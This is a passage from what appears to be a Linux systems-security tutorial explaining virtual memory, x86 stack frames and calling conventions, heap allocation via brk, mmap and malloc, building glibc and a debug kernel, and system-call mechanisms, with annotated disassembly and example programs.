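unsigned long auxv_page_size(void)
{
    unsigned long sz = getauxval(AT_PAGESZ);
    assert(sz != 0);   /* getauxval returns 0 when the entry is absent */
    return sz;
}
```

On the machine that produced the listing above, this would be expected to return 4096, the same value sysconf(_SC_PAGESIZE) reports.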
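Memory management
What is memory
To give each user program a private address space and its own CPU at run time, as if it had the whole machine to itself, modern operating systems introduced the concept of virtual memory.
Virtual memory serves three main purposes:
- It treats main memory as a cache for an address space stored on disk, keeping only the active areas in memory and moving data between disk and memory as needed.
- It provides every process with a uniform address space.
- It protects the address space of each process from being corrupted by other processes.
Modern operating systems use virtual addressing: the CPU accesses memory by generating a virtual address (VA), which the memory management unit (MMU) translates into a physical address before it is sent to memory.
As we saw earlier, an executable file is mapped into memory. Linux maintains a separate virtual address space for each process, containing .text, .data, .bss, the stack, the heap, shared libraries, and so on.
A 32-bit system has a 4 GB address space. With the usual 3G/1G split on Linux, addresses up to 0xbfffffff belong to user space (3 GB; non-PIE executables are traditionally loaded at 0x08048000), and 0xc0000000~0xffffffff is kernel space (1 GB).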
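Stack and calling conventions
Stack
The stack is a last-in, first-out (LIFO) container, also described as first-in, last-out (FILO). It stores function return addresses and arguments, temporary variables, and related context. When a program calls a function, compiler-generated code automatically saves and restores the function's context by pushing and popping; the programmer does not have to do this by hand.
The stack grows from high addresses toward low addresses. The bookkeeping information needed for one function call is kept on the stack in a stack frame. On x86, register ebp points to the bottom of the stack frame and esp points to its top. A push decreases the stack-top address; a pop increases it.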
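- PUSH: pushes onto the stack. It decrements esp by 4 and then writes its single operand to the memory address that esp points to.
- POP: pops from the stack. It reads the data at the memory address that esp points to, loads it into the instruction's operand (usually a register), and then increments esp by 4.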
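The PUSH and POP behavior described above can be modeled with a toy stack. The sketch below is only a simulation in ordinary memory, not real register manipulation; all names (toy_stack, toy_push, toy_pop) are hypothetical, and esp is modeled as a byte offset into a small array.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy model of a 32-bit stack: `mem` is the backing memory and `esp`
   is a byte offset into it. The stack grows toward lower offsets. */
struct toy_stack {
    uint8_t  mem[64];
    uint32_t esp;
};

void toy_init(struct toy_stack *s)
{
    s->esp = sizeof s->mem;               /* empty stack: esp at the top */
}

void toy_push(struct toy_stack *s, uint32_t value)
{
    assert(s->esp >= 4);                  /* otherwise: stack overflow */
    s->esp -= 4;                          /* esp is decremented first */
    memcpy(&s->mem[s->esp], &value, 4);   /* then the operand is stored */
}

uint32_t toy_pop(struct toy_stack *s)
{
    uint32_t value;
    assert(s->esp + 4 <= sizeof s->mem);  /* otherwise: nothing to pop */
    memcpy(&value, &s->mem[s->esp], 4);   /* load the dword at [esp] */
    s->esp += 4;                          /* then esp is incremented */
    return value;
}
```

Pushing 1 and then 2 lowers esp by 8 in total; the first pop returns 2 and the second returns 1, which is the last-in, first-out order the stack guarantees.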
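A function call on x86 proceeds as follows:
- Push all or some of the arguments onto the stack; any arguments that are not pushed are passed in specific registers.
- Push the address of the instruction that follows the call onto the stack.
- Jump to the function body.
Steps 2 and 3 are performed together by the call instruction. After the jump, the function starts executing. An x86 function body typically begins like this: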
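- push ebp: push ebp onto the stack (the old ebp).
- mov ebp, esp: ebp = esp (ebp now points to the top of the stack, which holds the old ebp).
- [optional] sub esp, XXX: reserve XXX bytes of temporary space on the stack.
- [optional] push XXX: save the register named XXX.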
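ebp is pushed so that its previous value can be restored when the function returns, and other registers are pushed so that they keep the same value before and after the call. The operations on return mirror the prologue: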
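- [optional] pop XXX: restore the saved registers.
- mov esp, ebp: restore esp, which also releases the space used by local variables.
- pop ebp: restore the saved value of ebp.
- ret: take the return address from the stack and jump to it.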
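The assembly code corresponding to a stack frame:
PUSH ebp ; function entry (save the existing ebp on the stack before using it)
MOV ebp, esp ; copy the current esp into ebp
... ; function body
; however esp changes, ebp stays fixed, so locals and arguments can be addressed safely
MOV esp, ebp ; restore esp to the value it had at function entry
POP ebp ; restore the saved ebp before returning
RET ; return to the caller
The standard stack layout after a function call is shown in the figure below:
Let's look at an example (source):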
#include<stdio.h>
int add(int a, int b) {
int x = a, y = b;
return (x + y);
}
int main() {
int a = 1, b = 2;
printf("%d\n", add(a, b));
return 0;
}
Use gdb to view the corresponding assembly code, annotated here in detail:
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000563 <+0>: lea ecx,[esp+0x4] ;ecx = esp+0x4, the address of main()'s first argument
0x00000567 <+4>: and esp,0xfffffff0 ;align the stack to 16 bytes
0x0000056a <+7>: push DWORD PTR [ecx-0x4] ;push the dword at ecx-0x4, i.e. the return address stored at the original esp
0x0000056d <+10>: push ebp ;save the ebp in effect before main(); _start zeroed ebp, so ebp=0x0 here
0x0000056e <+11>: mov ebp,esp ;ebp = esp, establishing main()'s stack frame
0x00000570 <+13>: push ebx ;save ebx and ecx
0x00000571 <+14>: push ecx
0x00000572 <+15>: sub esp,0x10 ;reserve space for the locals a and b, keeping 16-byte alignment
0x00000575 <+18>: call 0x440 <__x86.get_pc_thunk.bx> ;load the address of the next instruction (0x57a) into ebx
0x0000057a <+23>: add ebx,0x1a86 ;ebx = 0x57a+0x1a86 = 0x2000, the base for position-independent data access (the GOT)
0x00000580 <+29>: mov DWORD PTR [ebp-0x10],0x1 ;a lives at ebp-0x10; this is a=1
0x00000587 <+36>: mov DWORD PTR [ebp-0xc],0x2 ;b lives at ebp-0xc; this is b=2
0x0000058e <+43>: push DWORD PTR [ebp-0xc] ;push b
0x00000591 <+46>: push DWORD PTR [ebp-0x10] ;push a
0x00000594 <+49>: call 0x53d <add> ;call add(); the return value is left in eax
0x00000599 <+54>: add esp,0x8 ;remove add()'s arguments from the stack
0x0000059c <+57>: sub esp,0x8 ;adjust esp to keep 16-byte alignment
0x0000059f <+60>: push eax ;push eax (the result of add())
0x000005a0 <+61>: lea eax,[ebx-0x19b0] ;eax = ebx-0x19b0, the address of the string "%d\n"
0x000005a6 <+67>: push eax ;push eax
0x000005a7 <+68>: call 0x3d0 <printf@plt> ;call printf()
0x000005ac <+73>: add esp,0x10 ;adjust esp to remove printf()'s arguments
0x000005af <+76>: mov eax,0x0 ;eax=0x0, the return value of main()
0x000005b4 <+81>: lea esp,[ebp-0x8] ;esp = ebp-0x8, which points at the saved ecx
0x000005b7 <+84>: pop ecx ;pop to restore ecx, ebx, ebp
0x000005b8 <+85>: pop ebx
0x000005b9 <+86>: pop ebp
0x000005ba <+87>: lea esp,[ecx-0x4] ;esp = ecx-0x4, the original esp, which points at the return address
0x000005bd <+90>: ret ;return, equivalent to pop eip
End of assembler dump.
gdb-peda$ disassemble add
Dump of assembler code for function add:
0x0000053d <+0>: push ebp ;save the ebp in effect before add()
0x0000053e <+1>: mov ebp,esp ;ebp = esp, establishing add()'s stack frame
0x00000540 <+3>: sub esp,0x10 ;reserve space for the locals x and y, keeping 16-byte alignment
0x00000543 <+6>: call 0x5be <__x86.get_pc_thunk.ax> ;load the address of the next instruction (0x548) into eax
0x00000548 <+11>: add eax,0x1ab8 ;eax = 0x548+0x1ab8 = 0x2000
0x0000054d <+16>: mov eax,DWORD PTR [ebp+0x8] ;load the dword at ebp+0x8 (0x1) into eax; ebp+0x4 holds the return address
0x00000550 <+19>: mov DWORD PTR [ebp-0x8],eax ;store eax (0x1) at ebp-0x8
0x00000553 <+22>: mov eax,DWORD PTR [ebp+0xc] ;load the dword at ebp+0xc (0x2) into eax
0x00000556 <+25>: mov DWORD PTR [ebp-0x4],eax ;store eax (0x2) at ebp-0x4
0x00000559 <+28>: mov edx,DWORD PTR [ebp-0x8] ;load the value at ebp-0x8 (0x1) into edx
0x0000055c <+31>: mov eax,DWORD PTR [ebp-0x4] ;load the value at ebp-0x4 (0x2) into eax
0x0000055f <+34>: add eax,edx ;eax = eax+edx
0x00000561 <+36>: leave ;tear down the frame, equivalent to mov esp,ebp; pop ebp
0x00000562 <+37>: ret
End of assembler dump.
Since we are on Linux, where the entry point of an ELF file is actually _start rather than main(), the following function deserves attention as well:
gdb-peda$ disassemble _start
Dump of assembler code for function _start:
0x00000400 <+0>: xor ebp,ebp ;zero ebp, so the caller's ebp saved in main()'s stack frame is 0x00000000
0x00000402 <+2>: pop esi ;pop argc into esi
0x00000403 <+3>: mov ecx,esp ;ecx = top of stack (the start address of the argv and envp arrays)
0x00000405 <+5>: and esp,0xfffffff0 ;align the stack to 16 bytes
0x00000408 <+8>: push eax ;push eax, esp, edx
0x00000409 <+9>: push esp
0x0000040a <+10>: push edx
0x0000040b <+11>: call 0x432 <_start+50> ;push the address of the next instruction (0x00000410), then jump to 0x00000432
0x00000410 <+16>: add ebx,0x1bf0 ;ebx = 0x410+0x1bf0 = 0x2000
0x00000416 <+22>: lea eax,[ebx-0x19d0] ;load the address of <__libc_csu_fini> into eax, then push it
0x0000041c <+28>: push eax
0x0000041d <+29>: lea eax,[ebx-0x1a30] ;load the address of <__libc_csu_init> into eax, then push it
0x00000423 <+35>: push eax
0x00000424 <+36>: push ecx ;push ecx (argv) and esi (argc)
0x00000425 <+37>: push esi
0x00000426 <+38>: push DWORD PTR [ebx-0x8] ;push the entry address of main(), which is passed to __libc_start_main
0x0000042c <+44>: call 0x3e0 <__libc_start_main@plt> ;call __libc_start_main
0x00000431 <+49>: hlt ;hlt halts the processor without affecting flags; the CPU leaves the halt state on a RESET signal, a non-maskable interrupt, or a maskable interrupt. It is only reached if __libc_start_main returns
0x00000432 <+50>: mov ebx,DWORD PTR [esp] ;load the dword at [esp] (the return address) into ebx
0x00000435 <+53>: ret ;return, equivalent to pop eip
0x00000436 <+54>: xchg ax,ax ;exchange ax with ax, equivalent to a nop
0x00000438 <+56>: xchg ax,ax
0x0000043a <+58>: xchg ax,ax
0x0000043c <+60>: xchg ax,ax
0x0000043e <+62>: xchg ax,ax
End of assembler dump.
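Calling conventions
A calling convention is an agreement on how arguments are passed when a function is called. Before the call, the arguments are pushed onto the stack (or placed in registers) so that the callee can find them.
A calling convention covers roughly the following:
- The order and method of passing arguments
- How the stack is maintained
- The name-decoration scheme
The main calling conventions are listed below; cdecl is the default for C:
Calling convention | Stack cleanup | Argument passing | Name decoration |
---|---|---|---|
cdecl | Caller | Arguments are pushed right to left | Underscore + function name |
stdcall | Callee | Arguments are pushed right to left | Underscore + function name + @ + number of argument bytes |
fastcall | Callee | The first two arguments of DWORD (4-byte) size or smaller are passed in registers (ecx and edx); the rest are pushed right to left | @ + function name + @ + number of argument bytes |
Besides arguments, a function and its caller also interact through the return value. A return value of at most 4 bytes is stored in eax. A return value of 5 to 8 bytes is returned in eax and edx together, with eax holding the low 4 bytes and edx the high 4 bytes.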
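The eax/edx split for 5 to 8 byte return values is plain bit arithmetic. The following sketch models it with ordinary integers; the struct reg_pair and the function split_return_value are hypothetical names used only for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical model of the register pair used for 64-bit returns. */
struct reg_pair {
    uint32_t eax;  /* low 4 bytes of the return value */
    uint32_t edx;  /* high 4 bytes of the return value */
};

/* Split a 64-bit value the way a 32-bit x86 function returns it. */
struct reg_pair split_return_value(uint64_t value)
{
    struct reg_pair r;
    r.eax = (uint32_t)(value & 0xffffffffu);
    r.edx = (uint32_t)(value >> 32);
    /* Recombining edx:eax must reproduce the original value. */
    assert((((uint64_t)r.edx << 32) | r.eax) == value);
    return r;
}
```

For the value 0x1122334455667788, eax would hold 0x55667788 and edx would hold 0x11223344.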
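Heap and memory management
Heap
The heap is the memory region that holds everything that does not live on the stack; it is maintained by a dynamic memory allocator. The allocator treats the heap as a collection of blocks of various sizes, each block being a contiguous chunk of virtual memory. Calls to malloc() and free() operate on heap memory. Because freeing heap memory is the programmer's responsibility, memory leaks are easy to introduce.
The heap grows toward higher addresses and is not necessarily one contiguous region. This is because free memory is tracked in linked lists, which are traversed from low to high addresses. The size of the heap is limited by the virtual memory available on the system, so heap space is both flexible and comparatively large.
Issuing a system call for every allocation would seriously hurt performance. Typically the runtime library first obtains a large region of heap space from the operating system "wholesale" and then hands it out to the program "retail". When everything is "sold out", or what remains cannot satisfy a request, the library goes back to the operating system to "restock".
Process heap management
Linux provides two ways to allocate heap space: the brk() system call and the mmap() system call. See man brk and man mmap for details.
brk() is declared as follows: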
#include <unistd.h>
int brk(void *addr);
void *sbrk(intptr_t increment);
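The argument addr is the new end address of the process's data segment (the program break). brk() changes the size of the data segment by moving this address: moving it toward higher addresses enlarges the process's memory, and moving it toward lower addresses shrinks it. brk() returns 0 on success and -1 on failure. sbrk() is similar, but its argument increment is a delta, that is, the number of bytes to grow or shrink by. On success it returns the previous program break (the end address before the change); on failure it returns (void *)-1.
In the figure above, brk marks the end of the heap and start_brk marks its start. Between the BSS segment and the heap lies a random brk offset introduced by ASLR. With ASLR disabled the offset is 0, and the start of the heap coincides with the end of the data segment.
Example (source):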
#include <stdio.h>
#include <unistd.h>
int main(void) {
    void *curr_brk, *tmp_brk, *pre_brk;
    printf("PID of this process: %d\n", getpid());
    tmp_brk = curr_brk = sbrk(0);
    printf("Program break after startup: %p\n", curr_brk);
    getchar();
    brk((char *)curr_brk + 4096); /* grow the heap by one page */
    curr_brk = sbrk(0);
    printf("Program break after brk: %p\n", curr_brk);
    getchar();
    pre_brk = sbrk(4096); /* grow again; returns the previous break */
    curr_brk = sbrk(0);
    printf("sbrk return value (the previous break): %p\n", pre_brk);
    printf("Program break after sbrk: %p\n", curr_brk);
    getchar();
    brk(tmp_brk); /* shrink back to the initial break */
    curr_brk = sbrk(0);
    printf("Program break restored to its initial value: %p\n", curr_brk);
    getchar();
    return 0;
}
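Open two terminals, one to run the program and one to observe its memory map. We first look at the case with ASLR disabled. Step one, startup:
# echo 0 > /proc/sys/kernel/randomize_va_space
$ ./a.out
PID of this process: 27759
Program break after startup: 0x56579000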
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-56579000 rw-p 00000000 00:00 0 [heap]
...
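The end of the data segment and the start of the heap are both 0x56558000, and the heap ends at 0x56579000.
Step two, grow the heap with brk():
$ ./a.out
PID of this process: 27759
Program break after startup: 0x56579000
Program break after brk: 0x5657a000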
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-5657a000 rw-p 00000000 00:00 0 [heap]
...
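The start of the heap is unchanged and its end has grown to 0x5657a000.
Step three, grow the heap with sbrk():
$ ./a.out
PID of this process: 27759
Program break after startup: 0x56579000
Program break after brk: 0x5657a000
sbrk return value (the previous break): 0x5657a000
Program break after sbrk: 0x5657b000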
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-5657b000 rw-p 00000000 00:00 0 [heap]
...
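Step four, shrink the heap:
$ ./a.out
PID of this process: 27759
Program break after startup: 0x56579000
Program break after brk: 0x5657a000
sbrk return value (the previous break): 0x5657a000
Program break after sbrk: 0x5657b000
Program break restored to its initial value: 0x56579000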
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-56579000 rw-p 00000000 00:00 0 [heap]
...
Now the same experiment with ASLR enabled:
# echo 2 > /proc/sys/kernel/randomize_va_space
$ ./a.out
PID of this process: 28025
Program break after startup: 0x578ad000
# cat /proc/28025/maps
...
5663f000-56640000 rw-p 00001000 08:01 28587506 /home/a.out
5788c000-578ad000 rw-p 00000000 00:00 0 [heap]
...
This time the end of the data segment, 0x56640000, differs from the start of the heap, 0x5788c000.
mmap() is declared as follows:
#include <sys/mman.h>
void *mmap(void *addr, size_t len, int prot, int flags,
int fildes, off_t off);
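mmap() creates a new virtual memory area and maps an object into it. When the area is not backed by a file it is called an anonymous mapping, and anonymous mappings can serve as heap space. mmap() asks the kernel to create a new virtual memory area, preferably starting at address addr, and to map a contiguous chunk of the object designated by the file descriptor fildes into it. The chunk is len bytes long and starts off bytes from the beginning of the file. prot holds the access permission bits of the area, and flags holds bits that describe the type of the mapped object.
munmap() deletes a virtual memory area: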
#include <sys/mman.h>
int munmap(void *addr, size_t len);
Example (source):
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
int main(void) {
    printf("PID of this process: %d\n", getpid());
    printf("After startup\n");
    getchar();
    char *addr;
    /* anonymous mappings ignore the fd; -1 is the portable value */
    addr = mmap(NULL, (size_t)4096, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    printf("mmap done\n");
    getchar();
    munmap(addr, (size_t)4096);
    printf("munmap done\n");
    getchar();
    return 0;
}
Step one, startup:
$ ./a.out
PID of this process: 28652
After startup
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...
Step two, mmap:
$ ./a.out
PID of this process: 28652
After startup
mmap done
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ee000-f76f1000 rw-p 00000000 00:00 0
...
Step three, munmap:
$ ./a.out
PID of this process: 28652
After startup
mmap done
munmap done
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...
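The start address of the second mapping changes from f76ef000 to f76ee000 and back to f76ef000. The difference is 0xf76ef000 - 0xf76ee000 = 0x1000 = 4096 bytes, the size of the mapping.
Normally we do not call brk() or mmap() directly to allocate heap space. The C standard library provides an allocator called malloc, and a program allocates blocks from the heap by calling malloc(), declared as follows: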
#include <stdlib.h>
void *malloc(size_t size);
void free(void *ptr);
void *calloc(size_t nmemb, size_t size);
void *realloc(void *ptr, size_t size);
Example:
#include <stdio.h>
#include <stdlib.h>
void foo(int n) {
    int *p;
    p = (int *)malloc(n * sizeof(int));
    for (int i=0; i<n; i++) {
        p[i] = i;
        printf("%d ", p[i]);
    }
    printf("\n");
    free(p);
}
int main(void) {
    int n;
    scanf("%d", &n);
    foo(n);
    return 0;
}
Output:
$ ./malloc
4
0 1 2 3
$ ./malloc
8
0 1 2 3 4 5 6 7
$ ./malloc
16
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Use gdb to view the disassembly:
gdb-peda$ disassemble foo
Dump of assembler code for function foo:
0x0000066d <+0>: push ebp
0x0000066e <+1>: mov ebp,esp
0x00000670 <+3>: push ebx
0x00000671 <+4>: sub esp,0x14
0x00000674 <+7>: call 0x570 <__x86.get_pc_thunk.bx>
0x00000679 <+12>: add ebx,0x1987
0x0000067f <+18>: mov eax,DWORD PTR [ebp+0x8]
0x00000682 <+21>: shl eax,0x2
0x00000685 <+24>: sub esp,0xc
0x00000688 <+27>: push eax
0x00000689 <+28>: call 0x4e0 <malloc@plt>
0x0000068e <+33>: add esp,0x10
0x00000691 <+36>: mov DWORD PTR [ebp-0xc],eax
0x00000694 <+39>: mov DWORD PTR [ebp-0x10],0x0
0x0000069b <+46>: jmp 0x6d9 <foo+108>
0x0000069d <+48>: mov eax,DWORD PTR [ebp-0x10]
0x000006a0 <+51>: lea edx,[eax*4+0x0]
0x000006a7 <+58>: mov eax,DWORD PTR [ebp-0xc]
0x000006aa <+61>: add edx,eax
0x000006ac <+63>: mov eax,DWORD PTR [ebp-0x10]
0x000006af <+66>: mov DWORD PTR [edx],eax
0x000006b1 <+68>: mov eax,DWORD PTR [ebp-0x10]
0x000006b4 <+71>: lea edx,[eax*4+0x0]
0x000006bb <+78>: mov eax,DWORD PTR [ebp-0xc]
0x000006be <+81>: add eax,edx
0x000006c0 <+83>: mov eax,DWORD PTR [eax]
0x000006c2 <+85>: sub esp,0x8
0x000006c5 <+88>: push eax
0x000006c6 <+89>: lea eax,[ebx-0x17e0]
0x000006cc <+95>: push eax
0x000006cd <+96>: call 0x4b0 <printf@plt>
0x000006d2 <+101>: add esp,0x10
0x000006d5 <+104>: add DWORD PTR [ebp-0x10],0x1
0x000006d9 <+108>: mov eax,DWORD PTR [ebp-0x10]
0x000006dc <+111>: cmp eax,DWORD PTR [ebp+0x8]
0x000006df <+114>: jl 0x69d <foo+48>
0x000006e1 <+116>: sub esp,0xc
0x000006e4 <+119>: push 0xa
0x000006e6 <+121>: call 0x500 <putchar@plt>
0x000006eb <+126>: add esp,0x10
0x000006ee <+129>: sub esp,0xc
0x000006f1 <+132>: push DWORD PTR [ebp-0xc]
0x000006f4 <+135>: call 0x4c0 <free@plt>
0x000006f9 <+140>: add esp,0x10
0x000006fc <+143>: nop
0x000006fd <+144>: mov ebx,DWORD PTR [ebp-0x4]
0x00000700 <+147>: leave
0x00000701 <+148>: ret
End of assembler dump.
The malloc implementation in glibc is an important topic, which we cover in detail in a later chapter.
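The foo() example above passes user input straight to malloc() and never checks the result. A more defensive variant might look like the sketch below; the function name make_int_sequence and its policy of rejecting n == 0 are assumptions for illustration, not part of the original program.

```c
#include <assert.h>
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper: allocate an array holding 0, 1, ..., n-1.
   Returns NULL if n is 0, if n does not fit the int element type,
   if n * sizeof(int) would overflow, or if malloc() fails.
   The caller releases the array with free(). */
int *make_int_sequence(size_t n)
{
    if (n == 0 || n > (size_t)INT_MAX)
        return NULL;
    if (n > SIZE_MAX / sizeof(int))      /* multiplication would wrap */
        return NULL;

    int *p = malloc(n * sizeof *p);
    if (p == NULL)
        return NULL;

    for (size_t i = 0; i < n; i++)
        p[i] = (int)i;
    assert(p[n - 1] == (int)(n - 1));
    return p;
}
```

The size check matters because a wrapped multiplication would make malloc() return a block that is far smaller than the loop assumes, which is a classic source of heap overflows.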
glibc malloc
glibc
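glibc, the GNU C Library, is the C standard library developed for the GNU operating system. It consists of two main parts: the header files, located in /usr/include, and the library binaries. The binaries are mainly the C standard library itself, in a dynamic and a static version: the dynamic version is /lib/libc.so.6 and the static version is /usr/lib/libc.a.
In this chapter we read and analyze the glibc source code. First download it and switch to the version we need: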
$ git clone git://sourceware.org/git/glibc.git
$ cd glibc
$ git checkout --track -b local_glibc-2.23 origin/release/2.23/master
Now build it. First edit the configuration file Makeconfig and comment out -Werror, so that newer versions of GCC (v8.1.0 here) do not treat warnings as errors:
$ cat Makeconfig | grep -i werror | grep warn
+gccwarn += #-Werror
Next, apply a patch:
$ cat regexp.patch
diff --git a/misc/regexp.c b/misc/regexp.c
index 19d76c0..9017bc1 100644
--- a/misc/regexp.c
+++ b/misc/regexp.c
@@ -29,14 +29,17 @@
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_23)
-/* Define the variables used for the interface. */
-char *loc1;
-char *loc2;
+#include <stdlib.h> /* Get NULL. */
+
+/* Define the variables used for the interface. Avoid .symver on common
+ symbol, which just creates a new common symbol, not an alias. */
+char *loc1 = NULL;
+char *loc2 = NULL;
compat_symbol (libc, loc1, loc1, GLIBC_2_0);
compat_symbol (libc, loc2, loc2, GLIBC_2_0);
/* Although we do not support the use we define this variable as well. */
-char *locs;
+char *locs = NULL;
compat_symbol (libc, locs, locs, GLIBC_2_0);
$ patch misc/regexp.c regexp.patch
Then it can be compiled:
$ mkdir build && cd build
$ ../configure --prefix=/usr/local/glibc-2.23
$ make -j4 && sudo make install
To build a program against a specific libc, do the following:
$ gcc -L/usr/local/glibc-2.23/lib -Wl,--rpath=/usr/local/glibc-2.23/lib -Wl,-I/usr/local/glibc-2.23/lib/ld-2.23.so test.c
$ ldd a.out
linux-vdso.so.1 (0x00007ffcc76b0000)
libc.so.6 => /usr/local/glibc-2.23/lib/libc.so.6 (0x00007f6abd578000)
/usr/local/glibc-2.23/lib/ld-2.23.so => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f6abdb1c000)
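To point gdb at the libc sources while debugging, you can use the gdb command directory. Its drawback is that it does not search subdirectories, so we recommend loading all source directories at startup with the following command: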
gdb `find ~/path/to/glibc/source -type d -printf '-d %p '` ./a.out
malloc.c
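We first analyze the source of glibc 2.23, which is the default version in Ubuntu 16.04 and the one most commonly seen in pwn challenges. After that we discuss the exploit mitigations added in newer glibc versions.
Related structures
Chunk structure
- Allocated Chunk
- Free Chunk
- Top Chunk
Bins structure
- Fast Bins
- Small Bins
- Large Bins
- Unsorted Bins
Arena structure
Allocation function
_int_malloc()
Free function
_int_free()
Reallocation function
_int_realloc()
Linux kernel
Building and installing
My build environment is shown below. First install the required packages: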
$ uname -a
Linux firmy-pc 4.14.34-1-MANJARO #1 SMP PREEMPT Thu Apr 12 17:26:43 UTC 2018 x86_64 GNU/Linux
$ yaourt -S base-devel
For study purposes pick a stable release, for example 4.16.3, the latest at the time of writing.
$ mkdir ~/kernelbuild && cd ~/kernelbuild
$ wget -c https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.16.3.tar.xz
$ tar -xvJf linux-4.16.3.tar.xz
$ cd linux-4.16.3/
$ make clean && make mrproper
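The kernel's configuration options live in the .config file. There are two ways to set them. One is to start from the configuration of the running kernel: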
$ zcat /proc/config.gz > .config
$ make oldconfig
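The other is to generate a configuration yourself:
$ make localmodconfig # based on the current configuration and the currently loaded modules
# OR
$ make defconfig # based on the default configuration for the current architecture
To be able to debug the kernel, set the following options: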
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_INFO_REDUCED=n
CONFIG_GDB_SCRIPTS=y
To use kgdb, the following options are needed as well:
CONFIG_STRICT_KERNEL_RWX=n
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
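CONFIG_STRICT_KERNEL_RWX marks certain kernel memory regions read-only, which prevents software breakpoints from being set, so it is best turned off. To use kdb as well, add the following on top of the options above: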
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y
In addition, if you do not want KASLR to interfere with debugging, it can be disabled at build time:
CONFIG_RANDOMIZE_BASE=n
CONFIG_RANDOMIZE_MEMORY=n
Write the options above to a file named .config-fragment and merge it into .config:
$ ./scripts/kconfig/merge_config.sh .config .config-fragment
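Finally, the kernel is built with -O2 optimization by default; the Makefile can be changed to use -O0 (note that the kernel may fail to build without optimization, so this change might need to be limited or reverted):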
KBUILD_CFLAGS += -O0
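Build the kernel:
$ make
Installation would normally follow, but we do not actually want to replace the kernel on this machine, so the rest of the process is handed over to QEMU (see section 4.1).
System calls
In Linux, system calls are functions that run in kernel space and are the only means by which user-space programs can request kernel services. They are architecture-specific: x86-64 provides 322 system calls and x86 provides 358 (see appendix 9.4).
Below is an example written in 32-bit assembly (source):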
.data
msg:
.ascii "hello 32-bit!\n"
len = . - msg
.text
.global _start
_start:
movl $len, %edx
movl $msg, %ecx
movl $1, %ebx
movl $4, %eax
int $0x80
movl $0, %ebx
movl $1, %eax
int $0x80
Assemble, link, and run (this source can also be built as a 64-bit program):
$ gcc -m32 -c hello32.S
$ ld -m elf_i386 -o hello32 hello32.o
$ strace ./hello32
execve("./hello32", ["./hello32"], 0x7ffff990f830 /* 68 vars */) = 0
strace: [ Process PID=19355 runs in 32 bit mode. ]
write(1, "hello 32-bit!\n", 14hello 32-bit!
) = 14
exit(0) = ?
+++ exited with 0 +++
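As the trace shows, the program places the system call number in eax and invokes the system call with int $0x80.
The int 0x80 software interrupt is the classic mechanism, used by kernels up to and including the early 2.6 series. Because it performs relatively poorly, later kernels use fast system call instructions instead: 32-bit systems use sysenter (paired with sysexit), and 64-bit systems use syscall (paired with sysret).
An example that uses sysenter: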
.data
msg:
.ascii "Hello sysenter!\n"
len = . - msg
.text
.globl _start
_start:
movl $len, %edx
movl $msg, %ecx
movl $1, %ebx
movl $4, %eax
# Setting up the stack for sysenter
pushl $sysenter_ret
pushl %ecx
pushl %edx
pushl %ebp
movl %esp, %ebp
sysenter
sysenter_ret:
movl $0, %ebx
movl $1, %eax
# Setting up the stack for sysenter
pushl $sysenter_ret
pushl %ecx
pushl %edx
pushl %ebp
movl %esp, %ebp
sysenter
$ gcc -m32 -c sysenter.S
$ ld -m elf_i386 -o sysenter sysenter.o
$ strace ./sysenter
execve("./sysenter", ["./sysenter"], 0x7fff73993fd0 /* 69 vars */) = 0
strace: [ Process PID=7663 runs in 32 bit mode. ]
write(1, "Hello sysenter!\n", 16Hello sysenter!
) = 16
exit(0) = ?
+++ exited with 0 +++
As shown, using sysenter requires laying out the stack by hand. This is because when sysenter returns, execution resumes in the second half of __kernel_vsyscall (starting at 0xf7fd5059):
gdb-peda$ vmmap vdso
Start End Perm Name
0xf7fd4000 0xf7fd6000 r-xp [vdso]
gdb-peda$ disassemble __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xf7fd5050 <+0>: push ecx
0xf7fd5051 <+1>: push edx
0xf7fd5052 <+2>: push ebp
0xf7fd5053 <+3>: mov ebp,esp
0xf7fd5055 <+5>: sysenter
0xf7fd5057 <+7>: int 0x80
0xf7fd5059 <+9>: pop ebp
0xf7fd505a <+10>: pop edx
0xf7fd505b <+11>: pop ecx
0xf7fd505c <+12>: ret
End of assembler dump.
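__kernel_vsyscall encapsulates the calling convention for sysenter and is part of the vDSO, which lets a program run kernel-provided code in user space. The vDSO is covered in detail in a later chapter.
Below is a 64-bit example that uses syscall: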
.data
msg:
.ascii "Hello 64-bit!\n"
len = . - msg
.text
.global _start
_start:
movq $1, %rdi
movq $msg, %rsi
movq $len, %rdx
movq $1, %rax
syscall
xorq %rdi, %rdi
movq $60, %rax
syscall
Assemble, link, and run (this source cannot be built as a 32-bit program):
$ gcc -c hello64.S
$ ld -o hello64 hello64.o
$ strace ./hello64
execve("./hello64", ["./hello64"], 0x7ffe11485290 /* 68 vars */) = 0
write(1, "Hello 64-bit!\n", 14Hello 64-bit!
) = 14
exit(0) = ?
+++ exited with 0 +++
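In these examples the programs invoke the write and exit system calls directly (the execve in each trace is issued when strace launches the program). Normally, however, applications are written against application programming interfaces (APIs) implemented in user space rather than against system calls directly. For example, a call to printf() goes through the following chain:
call to printf() ==> printf() in the C library ==> write() in the C library ==> write() system call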
